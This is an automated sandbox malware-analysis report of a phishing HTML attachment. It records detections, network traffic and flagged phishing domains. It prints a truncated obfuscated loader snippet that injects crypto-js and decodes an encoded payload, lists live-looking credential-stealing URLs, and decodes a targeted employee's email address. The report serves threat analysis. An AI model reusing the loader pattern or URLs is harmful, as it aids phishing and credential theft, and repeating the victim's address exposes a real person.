Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vRecord__0064secs__warriorsheart.com.html

Overview

General Information

Sample name:vRecord__0064secs__warriorsheart.com.html
Analysis ID:1577966
MD5:4376b42b8018b289a37f2cdb8fd3d3e5
SHA1:ea8e79365245406688edf252b91ccbd04bd602ab
SHA256:1f9213052e41530432c38abfbcbb4042739817637089fc61ff6b94f9eab418dc
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML page contains hidden javascript code
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 5356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\vRecord__0064secs__warriorsheart.com.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2580 --field-trial-handle=2540,i,15348211205700614738,394696290099158422,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://d7m.kczcylvjubu.ru/xJEob3V/#G#bWljaGVsbGUuYXhtYWtlckB3YXJyaW9yc2hlYXJ0LmNvbQ==SlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://d7m.kczcylvjubu.ru/favicon.icoAvira URL Cloud: Label: phishing
Source: https://yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru/memxymqebyrphctIBZHJHNAERMLGRRBXYGBJYSLXWCZFEWUYNPCWIYKNBXJXVZDLWGCXYJHQHADKEVPAvira URL Cloud: Label: malware
Source: https://d7m.kczcylvjubu.ru/xJEob3V/Avira URL Cloud: Label: phishing

Phishing

barindex
Source: 0.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://d7m.kczcylvjubu.ru/xJEob3V/#G#bWljaGVsbGUu... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a malicious domain upon certain conditions. These behaviors are highly indicative of a malicious script, likely used for phishing or other malicious purposes.
Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://d7m.kczcylvjubu.ru/xJEob3V/#G#bWljaGVsbGUu... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 1.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://paterbrothers.com/res444.php?2-68747470733... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code. While the script appears to be using legitimate cryptographic libraries, the overall behavior and lack of transparency raise significant security concerns.
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://d7m.kczcylvjubu.ru/xJEob3V/#G#bWljaGVsbGUu... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external domain. The combination of these behaviors suggests a high likelihood of malicious intent, potentially to prevent analysis or hide other malicious activities.
Source: 0.1.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/vRecord__0064secs__... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirection to a suspicious domain. The use of obfuscated code and the presence of a malicious-looking URL further increase the risk. Overall, this script exhibits a clear intent to perform malicious activities and should be considered a high-risk threat.
Source: vRecord__0064secs__warriorsheart.com.htmlHTTP Parser: Low number of body elements: 0
Source: vRecord__0064secs__warriorsheart.com.htmlHTTP Parser: Base64 decoded: michelle.axmaker@warriorsheart.com
Source: https://paterbrothers.com/res444.php?2-68747470733a2f2f44374d2e6b637a63796c766a7562752e72752f784a456f6233562f-butterburHTTP Parser: var tkwaqetfcultfzkc = document.createelement("script");tkwaqetfcultfzkc.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(tkwaqetfcultfzkc);tkwaqetfcultfzkc.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoinhvyohfavxlhnm1nsgzvy2vwrzdhmmsyrfl3vmhondi3y1g3amr4sujamtz4vjzxcg1tmzg3vfc3exdxzdlwrk9xdtd2mehvnhdjntljt2txuwpkynpsz0rdestzb0vswlhhwvnru0d6durrz0k0znfuvdbpalc0ugpclzddzwwxsnhhqvjmn2myahk4zli4ditvane5cfwvvvpzogexrhrbdfjatelyazbsddnqdm9szxnoy2fwyxi3vggyugjbced1am03dgnoq0toegjbclnnbmtfnunpemjswenrxc9sqkxzttfjvu1yuxpgahdywe1cnjfxrertwjfss1lazxqrchh0uk5trvfjrmc0xc80ahvuovdtrhg1sevbc0e5ajdhdwhclzbusenvclnxdhhlb0dgaefhcepownvzb1y2qvlnc3zlnznpq0tlchkzz2hsbhfktvv3s2jjtwfhwfvxemxrnu1vadzkzzfswjn3uu9bqurmylhuwdf5otroa3lkwllfttnaqkfpqwy5mhrjbvjnvxlvyk1sd013n0jewvnrm2fhq1yycvnvvliyzgviatfta2zzxc9mtdlusljduk5jmgl0uxlgevjrv1biaflxt3viq096ete1djnjcfc3uva5rkdavsthumdrru12rglqvejrc3uznwxdcdbvuknoatm0tktkz1g3vdnrwkh4nmzaztnycnu1sehxynjwme...
Source: vRecord__0064secs__warriorsheart.com.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/vRecord__0064secs__warriorsheart.com.htmlHTTP Parser: No favicon
Source: https://d7m.kczcylvjubu.ru/xJEob3V/#G#bWljaGVsbGUuYXhtYWtlckB3YXJyaW9yc2hlYXJ0LmNvbQ==HTTP Parser: No favicon
Source: https://d7m.kczcylvjubu.ru/xJEob3V/#G#bWljaGVsbGUuYXhtYWtlckB3YXJyaW9yc2hlYXJ0LmNvbQ==HTTP Parser: No favicon
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 104.21.78.181 104.21.78.181
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f44374d2e6b637a63796c766a7562752e72752f784a456f6233562f-butterbur HTTP/1.1Host: paterbrothers.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f44374d2e6b637a63796c766a7562752e72752f784a456f6233562f-butterbur HTTP/1.1Host: paterbrothers.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /xJEob3V/ HTTP/1.1Host: d7m.kczcylvjubu.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://d7m.kczcylvjubu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://d7m.kczcylvjubu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://d7m.kczcylvjubu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://d7m.kczcylvjubu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://d7m.kczcylvjubu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f4285124e7ede94&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: d7m.kczcylvjubu.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://d7m.kczcylvjubu.ru/xJEob3V/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldUWG80MS9TS0w2NytNZytpRWhhY3c9PSIsInZhbHVlIjoicVJYNFZWMmkydnUrZ0FMcEF2cGJTZmlsaFl3ZmRsVUdjaUhNZU5zVWFVeG1FZTZiYUxIaG9ZekdHdjNSb0oybWZicll0ODlRWkNMSnRZd1N6ZlBuOCtHemlEUzM1bUh5VzlHdk5FSEFYQjREOS9zZXVmK014OFNyNTVDOWJ0YXoiLCJtYWMiOiIyODgxYTM3Zjk5NGU1NjBlZmFiODFmNWNiOTcwNzMxZmY5MzEwZWFiZGM3NTAxMzQyMTg2ZmRlNGMzNWM3NjEzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhWbEVUTFhaWk5xUHc0Mkt3L29zVmc9PSIsInZhbHVlIjoiTlJTbVR5ZmVCeWZwbHByd3JEaGdZU20yNTZqbXlNeVlnR2c5UlZQMkFONUUxaUUrR2NSY250SUJrVnEwai9ZZFRlZzZIN1A5M3dWV216VFJ4R0I2cXlMb0VST3FHS1M0T0ZiY3BFR1Vnd2hlbTdUYms3S2ozREZLQTg1aVBRTHoiLCJtYWMiOiI1MDM5MzkzYjAzMWQzYTNhODY4MTQxY2ZkODE5YWFmODljMzJmNGUyYTIyMjdlMDRjYWViODM4NDM5MmU5MzUwIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f4285124e7ede94&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1795432094:1734556335:322H1YIrQj2slam4FeODcquin5MQ5gHchmAe7PwBA_Y/8f4285124e7ede94/8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f4285124e7ede94/1734560216957/tPFTqUIKTrQaUVs HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f4285124e7ede94/1734560216957/tPFTqUIKTrQaUVs HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f4285124e7ede94/1734560216958/0e5d024cec808bfbcf86376e9ceaa57ac340fc44d57c7e7275e86b26749de3f8/PF-ArXgsbeKP5qc HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1795432094:1734556335:322H1YIrQj2slam4FeODcquin5MQ5gHchmAe7PwBA_Y/8f4285124e7ede94/8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1795432094:1734556335:322H1YIrQj2slam4FeODcquin5MQ5gHchmAe7PwBA_Y/8f4285124e7ede94/8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /memxymqebyrphctIBZHJHNAERMLGRRBXYGBJYSLXWCZFEWUYNPCWIYKNBXJXVZDLWGCXYJHQHADKEVP HTTP/1.1Host: yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://d7m.kczcylvjubu.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://d7m.kczcylvjubu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
